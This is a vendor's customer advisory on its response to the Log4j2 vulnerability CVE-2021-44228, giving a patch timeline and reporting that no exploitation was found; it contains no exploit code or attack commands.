StreamShark Log4j2 Customer Advisory Regarding CVE-2021-44228
Summary:
We have reviewed all potentially impacted instances, and cannot reproduce nor find any evidence of successful exploitation of this vulnerability across any StreamShark system after a detailed review of application, system and audit logs. We have patched all hosts containing the vulnerable library with a corrected version on 10 Dec 2021 (PM PST)
Timeline:
- 10 Dec 2021 (AM PST) CVE-2021-44228 published
- 10 Dec 2021 (PM PST) CVE library patched by StreamShark on all hosts containing vulnerable library
- 11 Dec 2021 (PM PST) Additional configuration changes on JVM made to further harden settings vs other potential vulnerability vectors
Dear Customers,
On 10 Dec 2021 (AM PST) StreamShark became aware of CVE-2021-44228 relating to potential vulnerabilities in the use of a common Java logging framework, Apache Log4j2. The impacted versions were between 2.10 =< 2.14.1
Across StreamShark’s own Java-based code, products and endpoints we have standardised on a different logging framework – Log4j2 is not used.
We also performed a detailed review across all other 3rd party libraries and services which are leveraged in the hosting and delivery of StreamShark services across our Event and Scheduler capabilities.
A 3rd-party software engine was identified as having a potentially vulnerable version of Log4j2 on a subset of our Live Event and Live Schedule ingests. These systems were immediately patched on the same day – 10 Dec 2021 (PM PST) with a corrected version of the library.
We have consulted with the vendor of the 3rd party software engine, who reviewed the details of this CVE in the context of their software to identify if there is a threat, and have not confirmed any active threat.
We independently performed our own reconnaissance of the 3rd party software engine and could not successfully replicate the attack vector or achieve success in exploiting this vulnerability on a host unpatched for this CVE. Regardless, as noted, we have patched all hosts containing impacted library on 10 Dec 2021 (AM PST). We also identified further configuration changes to harden against other theoretical but uncommon vulnerability vectors which were deployed on 11 Dec 2021 (PM PST)
We have reviewed all potentially impacted instances, and cannot reproduce nor find any evidence of successful exploitation of this vulnerability across any StreamShark system after a detailed review of application, system and audit logs.
We continue to closely monitor the situation at hand as any new information comes to light. If further action is required, we will note it here.
Kind regards,
StreamShark Team